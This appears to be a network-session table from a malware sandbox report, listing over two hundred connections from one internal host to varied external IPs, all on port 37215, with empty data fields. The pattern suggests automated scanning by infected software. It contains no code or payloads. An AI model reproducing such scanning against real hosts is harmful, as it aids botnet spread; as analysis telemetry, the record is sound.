                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10456192.168.2.235412241.92.155.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10457192.168.2.2349618157.11.59.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10458192.168.2.2335302157.27.198.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10459192.168.2.2348692146.212.71.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10460192.168.2.2342514157.238.152.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10461192.168.2.233396841.15.68.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10462192.168.2.233860441.236.21.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10463192.168.2.235520641.175.48.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10464192.168.2.234128441.83.53.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10465192.168.2.234338827.205.173.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10466192.168.2.234382641.47.168.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10467192.168.2.234253677.183.192.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10468192.168.2.2358656160.5.42.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10469192.168.2.235898441.211.250.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10470192.168.2.2348256157.131.187.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10471192.168.2.2347518157.226.208.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10472192.168.2.2334214157.252.115.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10473192.168.2.2346152206.196.157.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10474192.168.2.2337158197.190.7.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10475192.168.2.2354042175.236.60.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10476192.168.2.2338728157.151.138.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10477192.168.2.235289035.118.117.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10478192.168.2.235169441.45.78.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10479192.168.2.2348506157.41.24.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10480192.168.2.234165641.142.80.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10481192.168.2.2345278197.234.219.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10482192.168.2.235060241.123.155.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10483192.168.2.235271448.61.120.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10484192.168.2.2345760157.166.102.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10485192.168.2.2337206157.113.253.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10486192.168.2.233858841.185.164.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10487192.168.2.2343144157.139.161.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10488192.168.2.2348118157.192.60.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10489192.168.2.2344900157.117.144.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10490192.168.2.236066641.127.219.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10491192.168.2.235686241.140.46.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10492192.168.2.2337870197.138.30.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10493192.168.2.2350402157.167.172.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10494192.168.2.2341708157.84.106.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10495192.168.2.233797841.217.255.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10496192.168.2.2336194157.2.160.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10497192.168.2.235906241.160.14.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10498192.168.2.2341306157.175.198.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10499192.168.2.234550241.12.26.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10500192.168.2.2358652157.245.202.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10501192.168.2.234971641.189.106.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10502192.168.2.2340740157.156.11.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10503192.168.2.2355144197.29.200.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10504192.168.2.236086041.23.10.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10505192.168.2.233533452.164.238.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10506192.168.2.2340836157.253.101.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10507192.168.2.2358346157.224.208.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10508192.168.2.233647241.1.214.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10509192.168.2.233571841.135.18.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10510192.168.2.2336950169.73.234.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10511192.168.2.2335104197.34.202.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10512192.168.2.2340772193.240.163.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10513192.168.2.2360126197.27.9.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10514192.168.2.2345368147.130.131.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10515192.168.2.235288241.125.57.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10516192.168.2.2343552197.211.35.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10517192.168.2.2356694157.163.84.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10518192.168.2.2339262197.63.122.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10519192.168.2.2355070222.216.246.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10520192.168.2.235127420.233.102.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10521192.168.2.2338502138.52.124.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10522192.168.2.2333734164.67.237.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10523192.168.2.2357730157.96.67.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10524192.168.2.2342230197.150.215.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10525192.168.2.2343476197.243.20.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10526192.168.2.2335880157.43.159.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10527192.168.2.2340828157.237.52.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10528192.168.2.2351006195.192.135.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10529192.168.2.2342690157.117.40.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10530192.168.2.234449472.55.26.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10531192.168.2.2349498197.129.35.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10532192.168.2.2332836197.101.62.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10533192.168.2.2345676197.6.150.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10534192.168.2.2352320222.92.193.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10535192.168.2.2350988123.122.185.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10536192.168.2.2358498157.204.47.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10537192.168.2.2337332157.150.4.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10538192.168.2.2334162197.69.26.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10539192.168.2.2349240197.88.218.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10540192.168.2.2337804140.170.109.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10541192.168.2.2347212157.13.214.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10542192.168.2.2348738123.160.249.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10543192.168.2.2344232198.239.59.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10544192.168.2.2354910157.84.1.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10545192.168.2.2345588197.213.66.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10546192.168.2.23523282.52.32.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10547192.168.2.2351744197.83.38.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10548192.168.2.2348816197.146.185.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10549192.168.2.2337558197.95.91.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10550192.168.2.2344796197.212.107.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10551192.168.2.2352504157.132.211.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10552192.168.2.2352552157.137.196.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10553192.168.2.234258241.172.146.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10554192.168.2.2349230197.196.171.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10555192.168.2.2352720157.207.80.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10556192.168.2.233931653.178.222.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10557192.168.2.2342238157.95.162.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10558192.168.2.233340841.3.8.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10559192.168.2.2340768157.164.71.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10560192.168.2.2336426197.203.248.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10561192.168.2.234769241.104.138.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10562192.168.2.2356024220.240.191.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10563192.168.2.2338260211.4.10.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10564192.168.2.2335980157.118.150.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10565192.168.2.2352526141.138.168.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10566192.168.2.233517241.228.109.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10567192.168.2.235709041.58.52.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10568192.168.2.2338626157.88.114.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10569192.168.2.2334250155.70.85.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10570192.168.2.2332946144.142.57.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10571192.168.2.2360918157.70.116.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10572192.168.2.2338298157.123.186.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10573192.168.2.2334082157.187.74.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10574192.168.2.2347420197.57.76.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10575192.168.2.2337226157.77.80.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10576192.168.2.2345532157.201.128.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10577192.168.2.2356036157.136.140.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10578192.168.2.234283643.195.23.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10579192.168.2.234109441.54.104.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10580192.168.2.2339962157.64.179.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10581192.168.2.2332846142.78.174.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10582192.168.2.2353994157.207.34.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10583192.168.2.235623441.47.102.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10584192.168.2.2359944157.247.66.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10585192.168.2.233342641.65.238.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10586192.168.2.2334240157.84.244.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10587192.168.2.23584685.10.73.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10588192.168.2.233333477.167.147.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10589192.168.2.2348660197.42.183.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10590192.168.2.2354550157.110.192.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10591192.168.2.2356476197.102.18.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10592192.168.2.2345620197.107.209.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10593192.168.2.2355254197.36.166.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10594192.168.2.2356788197.8.115.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10595192.168.2.2339396157.223.0.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10596192.168.2.2337024197.161.224.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10597192.168.2.2351164197.185.98.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10598192.168.2.2347304157.183.229.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10599192.168.2.234400441.193.157.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10600192.168.2.234277841.215.174.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10601192.168.2.2336142157.115.117.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10602192.168.2.235201441.86.239.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10603192.168.2.2339912157.205.64.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10604192.168.2.2354576197.221.207.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10605192.168.2.2338234197.38.254.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10606192.168.2.235007441.199.105.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10607192.168.2.235462841.234.14.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10608192.168.2.233511041.146.30.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10609192.168.2.2360404197.130.30.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10610192.168.2.2342518157.60.225.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10611192.168.2.2334304145.151.177.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10612192.168.2.2342912197.213.46.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10613192.168.2.2359392157.55.78.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10614192.168.2.2336640197.238.139.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10615192.168.2.234971441.67.89.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10616192.168.2.233776642.63.82.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10617192.168.2.2350916197.251.201.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10618192.168.2.2352762213.146.168.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10619192.168.2.2340370157.185.66.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10620192.168.2.233631441.51.86.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10621192.168.2.2345112186.246.90.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10622192.168.2.2349362157.42.28.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10623192.168.2.2348780208.138.86.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10624192.168.2.23408388.30.121.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10625192.168.2.234364041.109.224.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10626192.168.2.2339116112.64.179.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10627192.168.2.233521025.72.41.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10628192.168.2.2346376197.137.27.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10629192.168.2.234634842.228.244.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10630192.168.2.235006841.61.55.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10631192.168.2.2357758157.188.80.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10632192.168.2.2355878157.149.83.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10633192.168.2.2342706197.108.95.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10634192.168.2.2352406157.72.225.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10635192.168.2.2356430157.41.12.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10636192.168.2.235577441.230.17.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10637192.168.2.2355856197.177.197.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10638192.168.2.2339554168.192.123.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10639192.168.2.2347500157.50.55.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10640192.168.2.2347698157.255.198.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10641192.168.2.2358472157.135.132.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10642192.168.2.234892041.33.211.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10643192.168.2.2347470217.172.188.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10644192.168.2.2352350157.98.36.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10645192.168.2.2342898197.2.241.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10646192.168.2.2337394157.55.98.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10647192.168.2.2337502170.71.174.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10648192.168.2.2333272113.106.146.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10649192.168.2.2334942157.62.37.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10650192.168.2.235029241.23.137.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10651192.168.2.2357218157.207.169.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10652192.168.2.2356264157.128.245.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10653192.168.2.2347376157.133.167.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10654192.168.2.2345694157.97.141.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10655192.168.2.2358372197.240.241.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10656192.168.2.2335208197.154.43.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10657192.168.2.233738041.242.2.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10658192.168.2.2349570177.24.138.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10659192.168.2.2334262217.249.221.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10660192.168.2.2345432157.26.88.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10661192.168.2.235866241.170.243.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10662192.168.2.2344754197.89.163.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10663192.168.2.2356788197.58.122.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10664192.168.2.2350000197.163.223.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10665192.168.2.2352820157.65.40.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10666192.168.2.2344838157.16.182.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10667192.168.2.234417441.162.31.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10668192.168.2.2336678170.48.224.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10669192.168.2.2337074157.187.19.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10670192.168.2.23352202.226.226.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10671192.168.2.2345932157.183.125.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10672192.168.2.2341212157.88.160.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10673192.168.2.2335156157.167.120.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
